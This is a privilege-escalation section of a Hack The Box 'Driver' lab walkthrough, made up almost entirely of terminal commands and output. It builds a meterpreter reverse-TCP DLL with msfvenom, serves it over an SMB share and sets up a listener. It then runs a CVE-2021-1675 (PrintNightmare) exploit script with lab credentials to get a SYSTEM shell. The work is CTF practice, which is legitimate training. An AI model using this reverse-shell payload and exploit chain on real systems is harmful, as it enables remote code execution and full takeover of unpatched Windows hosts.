Priv Esc

adot@pwndot:~/htb/driver$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.18 LPORT=4443 -f dll > shell.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 9216 bytes

adot@pwndot:~/htb/driver$ impacket-smbserver share `pwd` -smb2support
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed

adot@pwndot:~$ msfconsole -q -x 'use exploit/multi/handler;set LHOST tun0; set LPORT 4443; set payload windows/x64/meterpreter/reverse_tcp; run'

adot@pwndot:~/htb/driver/CVE-2021-1675$ python3 CVE-2021-1675.py driver/tony:liltony@10.10.11.106 '\\10.10.14.18\share\shell.dll'
[*] Connecting to ncacn_np:10.10.11.106[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\10.10.14.18\share\shell.dll
[*] Try 1...
[*] Stage0: 0
[*] Try 2...
[*] Stage0: 0
[*] Try 3...

[*] Sending stage (203846 bytes) to 10.10.11.106
[*] Meterpreter session 1 opened (10.10.14.18:4443 -> 10.10.11.106:49429) at 2025-02-25 06:11:54 -0600

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

PreviousFoothold NextCredentials

Last updated 3 days ago

Was this helpful?